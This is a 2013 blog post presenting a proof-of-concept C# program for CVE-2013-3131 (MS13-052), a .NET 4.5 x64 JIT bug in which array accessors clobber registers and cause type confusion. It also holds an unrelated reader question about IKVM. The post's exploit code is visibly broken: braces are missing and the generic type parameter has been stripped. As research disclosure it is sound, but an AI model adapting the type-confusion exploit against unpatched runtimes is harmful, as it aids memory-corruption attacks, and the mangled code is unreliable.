# Wednesday, July 10, 2013
« Overriding a Final Finalize | Main | Java Method Overriding Is FUBAR Part 7 o... »
Type Confusion PoC for CVE-2013-3131 (MS13-052)

I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:

using System;
using System.Runtime.CompilerServices;

struct Foo {
  byte b1, b2, b3;

class U1 { }
class U2 { }

struct StackFields {
  internal object f1;
  internal U1 f2;
  internal U2 f3;

class Program {
  long field1;
  long field2;

  static void Main() {
    new Program().Get(new Foo[1, 1]);

  object Get(T[,] arr) {
    StackFields fields = new StackFields();
    fields.f1 = new U1();
    fields.f2 = new U1();
    fields.f3 = new U2();
    object v = arr[0, 0];
    field2 = field1;
    return v;

This requires .NET 4.5 x64 (and must be built/run in release mode).

The bug is that the array accessor that is generated clobbers the RSI and RDI registers.

Wednesday, July 10, 2013 1:05:47 PM (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]
Tuesday, October 1, 2013 11:29:59 AM (W. Europe Daylight Time, UTC+02:00)
Hi, I try use IKVMC and success convert Java to c#, but I have problems when use rxtx library. " Attempt to get long field "gnu.io.RXTXPort.eis" with illegal data type conversion to int" when try read Input stream from port. Please help me if you can.
Comments are closed.